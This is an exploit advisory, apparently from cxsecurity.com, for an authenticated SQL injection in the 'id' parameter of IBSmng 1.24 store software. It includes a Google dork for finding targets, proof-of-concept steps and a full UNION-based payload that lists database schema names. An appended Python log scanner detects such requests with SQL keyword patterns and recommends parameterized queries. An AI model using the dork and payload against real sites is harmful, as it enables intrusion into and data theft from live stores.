IBSmng 1.24 - 'id' SQL Injection (Authenticated)

2020.08.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: IBSmng 1.24 - 'id' SQL Injection (Authenticated)
# Dork: inurl:index.php inurl:group= inurl:mode=auto
# Date: 2020-08-02
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas, AmirMohammad Safari, Behzad khalife, Milad Ranjbar
# Vendor Homepage: IBSmng.ir
# Tested on: Windows/Linux
# Version: 1.24 [Final Version]

.:: Script Description ::.
This Script Is Used To Manage Your Online Store.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With the above Dork.
Step 2 - Create An Account.
Step 3 - Login To Your Account.
Step 4 - Click On Buy Services.
Step 5 - Inject Your Payload in 'id' Parameter.

.:: Sample Request ::.
localhost/user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11,12%23
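
.:: Detection Example (added) ::.
This is an added example, not part of the original advisory or the vendor's code: a web access-log check that flags Req=invoice requests whose 'id' parameter is not a plain integer. The assumption that invoice IDs are short positive integers, the combined log format, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses, times and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Aug/2020:10:01:11 +0000] "GET /user/index.php?Req=invoice&id=194732 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Aug/2020:10:02:40 +0000] "GET /user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+1,2,3%23 HTTP/1.1" 200 9321
203.0.113.6 - - [02/Aug/2020:10:03:02 +0000] "GET /user/index.php?Req=invoice&id=12abc HTTP/1.1" 200 812
203.0.113.7 - - [02/Aug/2020:10:04:15 +0000] "GET /user/index.php?Req=profile HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate invoice id is a short positive integer.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Tokens seen in the advisory's sample request, plus SQL quote/comment characters.
SQL_MARKERS = re.compile(
    r"\b(union|select|information_schema|concat)\b|['#]|--", re.I)


def classify_id(value):
    """Return 'ok', 'sqli-suspect' or 'malformed' for a decoded id value."""
    if VALID_ID.fullmatch(value):
        return "ok"
    return "sqli-suspect" if SQL_MARKERS.search(value) else "malformed"


def scan(log_text):
    """Return (client, verdict, decoded_id) for each suspicious invoice request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        # parse_qs URL-decodes values, so '+' and %23 are checked as ' ' and '#'.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "invoice" not in query.get("Req", []):
            continue
        for value in query.get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, verdict, value))
    return findings


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value!r}")
```

The same integer allow-list belongs in the application itself, together with a parameterized query, so the 'id' value never reaches the SQL text.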


Copyright 2020, cxsecurity.com